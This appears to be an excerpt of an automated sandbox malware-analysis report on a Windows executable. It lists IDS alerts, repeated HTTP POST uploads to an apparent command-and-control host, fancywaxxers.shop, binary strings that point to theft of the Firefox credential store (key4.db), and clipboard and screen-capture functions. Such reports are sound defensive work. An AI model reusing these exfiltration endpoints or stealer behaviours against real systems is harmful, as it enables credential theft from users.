                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49717 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49736 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 104.21.32.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XTEVJ4K09XD5XLUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SJ9KEQ9EX23R4F2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15087Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XF7EXX2N03UIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19927Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WZ9VX7QJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1185Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KCJP2GIMZMWWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587484Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: fancywaxxers.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: UhsjR3ZFTD.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227208638.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181347543.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227144209.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E6C000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005459000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217324289.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2228040812.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191841142.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/9
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227208638.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2157571888.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227249666.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217324289.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200483086.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191922285.0000000002F10000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005450000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2228040812.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2228022285.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2170817201.0000000002F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiE
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiM
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apid
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                Source: UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apil
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apitPK
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apixt.default-release/key4.dbPK
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2191772467.0000000005448000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2170745627.0000000005445000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2169941654.0000000005441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&re
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: UhsjR3ZFTD.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2158920512.000000000545D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2158920512.000000000545D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49736 version: TLS 1.2
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00432D70
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00432D70
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00432FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00432FE0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006E04120_2_006E0412
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006D34A00_2_006D34A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006CDE420_2_006CDE42
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006DE6FE0_2_006DE6FE
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006C973B0_2_006C973B
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004210603_2_00421060
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004388603_2_00438860
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004260003_2_00426000
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004193623_2_00419362
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043FB803_2_0043FB80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043BCE03_2_0043BCE0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004384F03_2_004384F0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004404803_2_00440480
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00418DF13_2_00418DF1
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004095A03_2_004095A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004086403_2_00408640
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0040D6F83_2_0040D6F8
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042BE8A3_2_0042BE8A
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004290403_2_00429040
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004380403_2_00438040
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042A0503_2_0042A050
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004258503_2_00425850
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004328003_2_00432800
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004198203_2_00419820
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043F0CB3_2_0043F0CB
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004038D03_2_004038D0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004058E03_2_004058E0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004308E03_2_004308E0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004088F03_2_004088F0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0040D0FF3_2_0040D0FF
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004158823_2_00415882
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0040A8A03_2_0040A8A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004390A03_2_004390A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004091403_2_00409140
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041D9403_2_0041D940
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004161483_2_00416148
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004061603_2_00406160
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004339603_2_00433960
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0042F1663_2_0042F166
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004159663_2_00415966
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004249743_2_00424974
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004401303_2_00440130
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004229CD3_2_004229CD
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_004111E93_2_004111E9
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043C1B03_2_0043C1B0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0043F1B03_2_0043F1B0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00427A5A3_2_00427A5A
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_0041D2603_2_0041D260
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00423A603_2_00423A60
